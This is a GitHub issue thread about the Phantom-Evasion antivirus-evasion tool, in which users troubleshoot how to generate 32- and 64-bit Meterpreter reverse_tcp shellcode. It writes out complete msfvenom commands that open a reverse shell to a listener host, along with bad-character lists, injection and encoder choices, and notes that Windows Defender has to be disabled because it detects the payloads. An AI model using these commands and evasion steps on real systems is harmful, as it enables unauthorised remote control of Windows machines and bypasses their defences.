Closed anonymouz4 closed 5 years ago
@anonymouz4 I will retest 32 bit shellcode from veil and share the results tomorrow.Maybe it's not working just for you
@usama7628674 I took the time to write this question as good as possible so please also read it carefully. The question is to create 64bit shellcode, which is not possible with veil.
@anonymouz4 Veil 32 bit shellcode is working fine.I got the session back to meterpreter.Just generated the shellcode and while compiling I used x86 arch and then ran it on my windows 10 v1803 and I can confirm I got the session.
Msfvenom 32 bit shellcode is also working fine and yes it wasn't dying for me.Make sure windows defender is turned off
The command I used while generating 32 bit shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d" > /root/Desktop/output
Msfvenom 64 bit shellcode is also working fine for me.The command that I used while generating 64 bit shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d/xf0" > /root/Desktop/outputs
All the tests are done with windows shellcode injection multipath heapalloc option no (4) and for encoder as well option (4)
All three options are working for me but sadly all are detected by windows defender.I've to disable it while testing
Make sure you setup 32 listener if you're using 32 bit shellcode and 64 bit listener if you're using 64 bit shellcode cuz I made a mistake that I setup 32 bit listener while I generated 64 bit shellcode the session did open but it instantly closed
metasploit version that I used 4.16.59-dev
@usama7628674 First, thanks for taking the time! Why did you also use "/xf0" as badchar or where did you get this info from? just curious And which os are you using as listener? I'm listening with msfconsole on MacOS. Maybe the metasploit-framework doesn't work 100% on mac.
@anonymouz4
Why did you also use "/xf0" as badchar or where did you get this info from?
I did use it in 64 bit shellcode cuz if I don't use it the output shellcode has bad characters \x00\x0d so that's why I use it.After using it all the bad chars were gone from shellcode.
And which os are you using as listener?
Kali linux 2018.2 Metasploit version 4.16.59-dev
A lot of people had issues with creating custom shellcode and using it.
What is the goal: Create a 64bit shellcode (reverse_tcp) and using it with Phantom-Evasion
Previous tries:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f c -b "/x00/x0a/x0d" > outfile
(usedwindows/x64/meterpreter/reverse_tcp
of course at 64bit in listener and generator)Question: Can anyone who got this working post a detailed list of steps he did to achieve this? Something like:
(eg. Veil, msfvenom, etc.)
(eg. None, Xor, etc.)
(eg. HeapAlloc, VirtualAlloc, etc.)
Maybe @oddcod3 already tested this!